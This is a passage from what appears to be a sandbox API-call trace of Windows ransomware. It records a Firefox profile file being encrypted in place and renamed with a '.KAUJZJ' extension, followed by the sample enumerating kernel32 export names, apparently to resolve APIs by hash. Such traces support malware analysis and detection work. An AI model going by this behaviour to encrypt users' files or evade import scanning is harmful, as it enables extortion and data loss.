(lpString="webapps.json.KAUJZJ") returned 19 [0184.580] lstrcmpiW (lpString1="KAUJZJ", lpString2="lnk") returned -1 [0184.580] lstrcmpiW (lpString1="KAUJZJ", lpString2="exe") returned 1 [0184.580] lstrcmpiW (lpString1="KAUJZJ", lpString2="sys") returned -1 [0184.580] lstrcmpiW (lpString1="KAUJZJ", lpString2="dll") returned 1 [0184.580] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0184.580] lstrlenW (lpString="webapps.json.KAUJZJ") returned 19 [0184.580] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0184.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json.KAUJZJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ" [0184.580] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.kaujzj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0184.581] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=266) returned 1 [0184.581] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0184.581] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.581] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.581] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.581] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.582] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd520*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd520*=0x100) returned 1 [0184.582] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.582] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.583] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.583] CloseHandle (hObject=0x290) returned 1 [0184.583] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.583] WriteFile (in: hFile=0x28c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd540, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd540*=0x108, lpOverlapped=0x0) returned 1 [0184.584] CloseHandle (hObject=0x0) returned 0 [0184.584] CloseHandle (hObject=0x28c) returned 1 [0184.584] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.584] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.584] GetTickCount () returned 0x113563b [0184.584] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.585] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.585] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.585] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.585] lstrlenA (lpString="kernel32.dll") returned 12 [0184.585] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.585] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.585] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.585] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.585] lstrlenA (lpString="ADDATOMA") returned 8 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.585] lstrlenA (lpString="ADDATOMW") returned 8 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.585] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.585] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.586] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.586] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.586] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.586] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.586] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.586] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.586] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.586] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.586] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.586] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.586] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.586] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.586] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.586] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.586] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.586] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.586] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.586] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.586] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.586] lstrcpyA (in: lpString1=0x36fc938, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.587] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.587] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.587] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.587] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.587] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.587] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.587] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.587] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.587] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.587] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.587] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.587] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.587] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.587] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.587] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.587] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.587] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.587] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.587] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.587] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.588] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.588] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.588] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.588] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.588] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.588] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.588] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.588] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.588] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.588] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.588] lstrlenA (lpString="BEEP") returned 4 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.588] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.588] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.588] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.588] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.588] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.588] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.588] lstrcpyA (in: lpString1=0x36fc938, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.589] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.589] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.589] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.589] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.589] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.589] lstrlenA (lpString="CANCELIO") returned 8 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.589] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.589] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.589] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.589] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.589] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.589] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.589] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.589] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.589] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.589] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.589] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.589] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.589] lstrcpyA (in: lpString1=0x36fc938, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.589] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.590] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.590] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.590] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.590] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.590] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.590] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.590] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.590] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.590] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.590] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.590] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.590] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.590] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.590] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.590] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.591] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.591] lstrcpyA (in: lpString1=0x36fc938, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.591] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.591] lstrcpyA (in: lpString1=0x36fc938, 